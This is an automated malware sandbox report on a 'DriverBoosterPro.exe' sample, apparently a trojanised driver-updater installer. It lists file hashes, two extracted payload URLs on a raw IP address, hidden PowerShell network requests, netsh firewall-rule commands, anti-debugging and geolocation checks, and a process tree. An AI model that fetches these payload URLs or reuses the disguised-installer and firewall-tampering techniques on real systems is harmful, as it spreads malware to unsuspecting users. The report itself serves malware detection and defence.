Overview
overview
10Static
static
3DriverBoosterPro.exe
windows7-x64
10DriverBoosterPro.exe
windows10-2004-x64
10Install.exe
windows7-x64
10Install.exe
windows10-2004-x64
10Installer.exe
windows7-x64
10Installer.exe
windows10-2004-x64
10Installlin...it.exe
windows7-x64
7Installlin...it.exe
windows10-2004-x64
7Setup.exe
windows7-x64
10Setup.exe
windows10-2004-x64
10Setup_1.exe
windows7-x64
10Setup_1.exe
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 00:56
Static task
static1
Behavioral task
behavioral1
Sample
DriverBoosterPro.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
DriverBoosterPro.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Install.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Install.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Installer.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
Installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
InstalllingFile_x64_x32mbit.exe
Resource
win7-20241010-en
Behavioral task
behavioral8
Sample
InstalllingFile_x64_x32mbit.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
Setup.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
Setup.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
Setup_1.exe
Resource
win7-20241010-en
General
-
Target
DriverBoosterPro.exe
-
Size
30.8MB
-
MD5
0d53802cb56260bfe67619aabfa4974f
-
SHA1
21375855ea1f0cf5fe8147a70031a44a626e0b07
-
SHA256
24f24ab0484ba98c79a49459178ea40ca2fecc54100cd913c7eff730be962290
-
SHA512
25c8930c2ec97a55d715ce5990c0ea6f1b3b266fbc20a9d012c2a7ead0d06345e4dcb85fac97ac678ab7d261e5241a5922841966df63ba8ae51b326af642c8b7
-
SSDEEP
393216:01NpF9ID9b3Mj4sVC3Z+dV+fOcaZ5xlux+Gd3nHGaTamTDWeMAQtJxKP+:0CD5FsCc44GZHrTFSFJKP+
Malware Config
Extracted
http://135.181.123.26/sccp32.dll
Extracted
http://135.181.123.26/rundll32.bat
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 16 1428 powershell.exe 18 1436 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4688 powershell.exe 1428 powershell.exe 1436 powershell.exe -
Modifies Windows Firewall 2 TTPs 6 IoCs
pid Process 1964 netsh.exe 4960 netsh.exe 2252 netsh.exe 3492 netsh.exe 2568 netsh.exe 672 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral2/files/0x0007000000023cc6-537.dat acprotect -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation DriverBoosterPro.tmp Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation Driver.Booster.10.0.0.65.tmp Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation AutoUpdate.exe -
Executes dropped EXE 15 IoCs
pid Process 3548 DriverBoosterPro.tmp 1652 Driver.Booster.10.0.0.65.exe 3512 Driver.Booster.10.0.0.65.tmp 1680 HWiNFO.exe 1832 DriverBooster.exe 2332 DriverBooster.exe 924 HWiNFO.exe 216 Manta.exe 4772 AutoUpdate.exe 3624 RttHlp.exe 8 Manta.exe 1248 Manta.exe 924 RttHlp.exe 4528 SetupHlp.exe 1836 rma.exe -
Loads dropped DLL 64 IoCs
pid Process 3548 DriverBoosterPro.tmp 3512 Driver.Booster.10.0.0.65.tmp 3512 Driver.Booster.10.0.0.65.tmp 3512 Driver.Booster.10.0.0.65.tmp 3512 Driver.Booster.10.0.0.65.tmp 1680 HWiNFO.exe 1832 DriverBooster.exe 1832 DriverBooster.exe 1832 DriverBooster.exe 1832 DriverBooster.exe 1832 DriverBooster.exe 1832 DriverBooster.exe 1832 DriverBooster.exe 1832 DriverBooster.exe 1832 DriverBooster.exe 1832 DriverBooster.exe 1832 DriverBooster.exe 1832 DriverBooster.exe 1832 DriverBooster.exe 1832 DriverBooster.exe 1832 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 216 Manta.exe 216 Manta.exe 216 Manta.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 4772 AutoUpdate.exe 4772 AutoUpdate.exe 4772 AutoUpdate.exe 4772 AutoUpdate.exe 4772 AutoUpdate.exe 4772 AutoUpdate.exe 4772 AutoUpdate.exe 216 Manta.exe 216 Manta.exe 3624 RttHlp.exe 3624 RttHlp.exe 3624 RttHlp.exe 8 Manta.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 1832 DriverBooster.exe 2332 DriverBooster.exe 216 Manta.exe 4772 AutoUpdate.exe 3624 RttHlp.exe 8 Manta.exe 1248 Manta.exe 924 RttHlp.exe 4528 SetupHlp.exe 1836 rma.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\IObit\Driver Booster\ScanWinUpd.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-LRLQJ.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\DrvInstall\DIFxAPI64.dll Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\IsuScan.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Boost\is-QTFRJ.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-TVRIQ.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\LocalData\is-7F240.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-DINMD.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\DpInst\x86\dpinst.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-APOD1.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-R9UMS.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-C6BDB.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\DrvInstall\DpInstX64.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-F5C01.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\Update\update.ini AutoUpdate.exe File created C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-IB9BR.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Update\dbxmas.exe\is-7SG65.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Update\Freeware.ini\is-HV9R6.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-KVM2B.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\Register.dll Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\Backup.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-MAECI.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-QK43A.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\RttHlp.exe Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\AutoNts.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\DrvInstall\is-8VPID.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-3I50Q.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-S7AKO.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-PGD3O.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\Pub Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\DrvInstall\is-UP10H.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-OASGN.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-OJVUR.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\version_IObitDel.dll DriverBooster.exe File created C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-OVNLR.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-I36B0.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-9FLO1.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-GF6H9.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-UO49V.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-K75Q9.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-28URF.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-H9BL8.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\version.dll Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\libssl-1_1.dll Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\rma.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\DpInst\x86\is-ULANQ.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-VDTEJ.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-GHJJQ.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-BPAVS.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\DpInst\x64\dbinst.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-CJVT1.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-25SJE.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Skin\is-OV3S4.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\DrvInstall\is-80J8R.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-O2RTV.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-416VU.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-MBIDV.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\DrvInstall\SetVolume64.dll Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Boost\is-5A66N.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\DpInst\x64\is-CPGUK.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\Update\xmas.exe Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\DrvInstall\DbzInst.dll Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\SetupHlp.exe Driver.Booster.10.0.0.65.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 28 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rma.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SetupHlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Manta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Manta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HWiNFO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AutoUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DriverBoosterPro.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DriverBooster.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RttHlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Driver.Booster.10.0.0.65.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Driver.Booster.10.0.0.65.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DriverBooster.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HWiNFO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Manta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RttHlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DriverBoosterPro.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 DriverBooster.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString DriverBooster.exe -
Kills process with taskkill 2 IoCs
pid Process 1416 taskkill.exe 3136 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 3548 DriverBoosterPro.tmp 3548 DriverBoosterPro.tmp 3512 Driver.Booster.10.0.0.65.tmp 3512 Driver.Booster.10.0.0.65.tmp 4688 powershell.exe 4688 powershell.exe 1428 powershell.exe 1428 powershell.exe 1436 powershell.exe 1436 powershell.exe 3512 Driver.Booster.10.0.0.65.tmp 3512 Driver.Booster.10.0.0.65.tmp 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 216 Manta.exe 216 Manta.exe 216 Manta.exe 216 Manta.exe 4772 AutoUpdate.exe 4772 AutoUpdate.exe 4772 AutoUpdate.exe 4772 AutoUpdate.exe 3624 RttHlp.exe 3624 RttHlp.exe 3624 RttHlp.exe 3624 RttHlp.exe 1248 Manta.exe 1248 Manta.exe 8 Manta.exe 8 Manta.exe 1248 Manta.exe 1248 Manta.exe 8 Manta.exe 8 Manta.exe 924 RttHlp.exe 924 RttHlp.exe 924 RttHlp.exe 924 RttHlp.exe 4528 SetupHlp.exe 4528 SetupHlp.exe 4528 SetupHlp.exe 4528 SetupHlp.exe 4528 SetupHlp.exe 4528 SetupHlp.exe 1836 rma.exe 1836 rma.exe -
Suspicious behavior: LoadsDriver 6 IoCs
pid Process 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 4688 powershell.exe Token: SeDebugPrivilege 1428 powershell.exe Token: SeDebugPrivilege 1436 powershell.exe Token: SeDebugPrivilege 1416 taskkill.exe Token: SeLoadDriverPrivilege 1680 HWiNFO.exe Token: SeDebugPrivilege 3136 taskkill.exe Token: SeLoadDriverPrivilege 1680 HWiNFO.exe Token: SeLoadDriverPrivilege 1680 HWiNFO.exe Token: 33 2332 DriverBooster.exe Token: SeIncBasePriorityPrivilege 2332 DriverBooster.exe Token: 33 2332 DriverBooster.exe Token: SeIncBasePriorityPrivilege 2332 DriverBooster.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 3548 DriverBoosterPro.tmp 3512 Driver.Booster.10.0.0.65.tmp 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 4772 AutoUpdate.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 2332 DriverBooster.exe 2332 DriverBooster.exe 2332 DriverBooster.exe 4772 AutoUpdate.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2816 wrote to memory of 3548 2816 DriverBoosterPro.exe 84 PID 2816 wrote to memory of 3548 2816 DriverBoosterPro.exe 84 PID 2816 wrote to memory of 3548 2816 DriverBoosterPro.exe 84 PID 3548 wrote to memory of 1652 3548 DriverBoosterPro.tmp 87 PID 3548 wrote to memory of 1652 3548 DriverBoosterPro.tmp 87 PID 3548 wrote to memory of 1652 3548 DriverBoosterPro.tmp 87 PID 3548 wrote to memory of 4264 3548 DriverBoosterPro.tmp 88 PID 3548 wrote to memory of 4264 3548 DriverBoosterPro.tmp 88 PID 3548 wrote to memory of 4264 3548 DriverBoosterPro.tmp 88 PID 1652 wrote to memory of 3512 1652 Driver.Booster.10.0.0.65.exe 90 PID 1652 wrote to memory of 3512 1652 Driver.Booster.10.0.0.65.exe 90 PID 1652 wrote to memory of 3512 1652 Driver.Booster.10.0.0.65.exe 90 PID 4264 wrote to memory of 4688 4264 cmd.exe 91 PID 4264 wrote to memory of 4688 4264 cmd.exe 91 PID 4264 wrote to memory of 4688 4264 cmd.exe 91 PID 4264 wrote to memory of 1428 4264 cmd.exe 97 PID 4264 wrote to memory of 1428 4264 cmd.exe 97 PID 4264 wrote to memory of 1428 4264 cmd.exe 97 PID 4264 wrote to memory of 1436 4264 cmd.exe 98 PID 4264 wrote to memory of 1436 4264 cmd.exe 98 PID 4264 wrote to memory of 1436 4264 cmd.exe 98 PID 3512 wrote to memory of 1416 3512 Driver.Booster.10.0.0.65.tmp 102 PID 3512 wrote to memory of 1416 3512 Driver.Booster.10.0.0.65.tmp 102 PID 3512 wrote to memory of 1416 3512 Driver.Booster.10.0.0.65.tmp 102 PID 3512 wrote to memory of 1680 3512 Driver.Booster.10.0.0.65.tmp 106 PID 3512 wrote to memory of 1680 3512 Driver.Booster.10.0.0.65.tmp 106 PID 3512 wrote to memory of 1680 3512 Driver.Booster.10.0.0.65.tmp 106 PID 3512 wrote to memory of 1832 3512 Driver.Booster.10.0.0.65.tmp 107 PID 3512 wrote to memory of 1832 3512 Driver.Booster.10.0.0.65.tmp 107 PID 3512 wrote to memory of 1832 3512 Driver.Booster.10.0.0.65.tmp 107 PID 3512 wrote to memory of 3136 3512 Driver.Booster.10.0.0.65.tmp 108 PID 3512 wrote to memory of 3136 3512 Driver.Booster.10.0.0.65.tmp 108 PID 3512 wrote to memory of 3136 3512 Driver.Booster.10.0.0.65.tmp 108 PID 3512 wrote to memory of 3492 3512 Driver.Booster.10.0.0.65.tmp 110 PID 3512 wrote to memory of 3492 3512 Driver.Booster.10.0.0.65.tmp 110 PID 3512 wrote to memory of 3492 3512 Driver.Booster.10.0.0.65.tmp 110 PID 3512 wrote to memory of 2568 3512 Driver.Booster.10.0.0.65.tmp 114 PID 3512 wrote to memory of 2568 3512 Driver.Booster.10.0.0.65.tmp 114 PID 3512 wrote to memory of 2568 3512 Driver.Booster.10.0.0.65.tmp 114 PID 3512 wrote to memory of 672 3512 Driver.Booster.10.0.0.65.tmp 116 PID 3512 wrote to memory of 672 3512 Driver.Booster.10.0.0.65.tmp 116 PID 3512 wrote to memory of 672 3512 Driver.Booster.10.0.0.65.tmp 116 PID 3512 wrote to memory of 1964 3512 Driver.Booster.10.0.0.65.tmp 118 PID 3512 wrote to memory of 1964 3512 Driver.Booster.10.0.0.65.tmp 118 PID 3512 wrote to memory of 1964 3512 Driver.Booster.10.0.0.65.tmp 118 PID 3512 wrote to memory of 4960 3512 Driver.Booster.10.0.0.65.tmp 120 PID 3512 wrote to memory of 4960 3512 Driver.Booster.10.0.0.65.tmp 120 PID 3512 wrote to memory of 4960 3512 Driver.Booster.10.0.0.65.tmp 120 PID 3512 wrote to memory of 2252 3512 Driver.Booster.10.0.0.65.tmp 122 PID 3512 wrote to memory of 2252 3512 Driver.Booster.10.0.0.65.tmp 122 PID 3512 wrote to memory of 2252 3512 Driver.Booster.10.0.0.65.tmp 122 PID 3512 wrote to memory of 2332 3512 Driver.Booster.10.0.0.65.tmp 124 PID 3512 wrote to memory of 2332 3512 Driver.Booster.10.0.0.65.tmp 124 PID 3512 wrote to memory of 2332 3512 Driver.Booster.10.0.0.65.tmp 124 PID 2332 wrote to memory of 924 2332 DriverBooster.exe 125 PID 2332 wrote to memory of 924 2332 DriverBooster.exe 125 PID 2332 wrote to memory of 924 2332 DriverBooster.exe 125 PID 2332 wrote to memory of 216 2332 DriverBooster.exe 126 PID 2332 wrote to memory of 216 2332 DriverBooster.exe 126 PID 2332 wrote to memory of 216 2332 DriverBooster.exe 126 PID 2332 wrote to memory of 4772 2332 DriverBooster.exe 127 PID 2332 wrote to memory of 4772 2332 DriverBooster.exe 127 PID 2332 wrote to memory of 4772 2332 DriverBooster.exe 127 PID 2332 wrote to memory of 3624 2332 DriverBooster.exe 128
Processes
-
C:\Users\Admin\AppData\Local\Temp\DriverBoosterPro.exe"C:\Users\Admin\AppData\Local\Temp\DriverBoosterPro.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\is-MUDGM.tmp\DriverBoosterPro.tmp"C:\Users\Admin\AppData\Local\Temp\is-MUDGM.tmp\DriverBoosterPro.tmp" /SL5="$A02C6,31312389,996352,C:\Users\Admin\AppData\Local\Temp\DriverBoosterPro.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Users\Admin\AppData\Local\Temp\is-GE40O.tmp\Driver.Booster.10.0.0.65.exe"C:\Users\Admin\AppData\Local\Temp\is-GE40O.tmp\Driver.Booster.10.0.0.65.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Users\Admin\AppData\Local\Temp\is-C6PJR.tmp\Driver.Booster.10.0.0.65.tmp"C:\Users\Admin\AppData\Local\Temp\is-C6PJR.tmp\Driver.Booster.10.0.0.65.tmp" /SL5="$3027A,29414238,361472,C:\Users\Admin\AppData\Local\Temp\is-GE40O.tmp\Driver.Booster.10.0.0.65.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im ScanWinUpd.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO.exe"C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO.exe" /brandname5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe"C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe" /skipuac5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1832
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /f /im DriverBooster.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3136
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Driver Booster" dir=out action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3492
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Driver Booster" dir=in action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2568
-
-
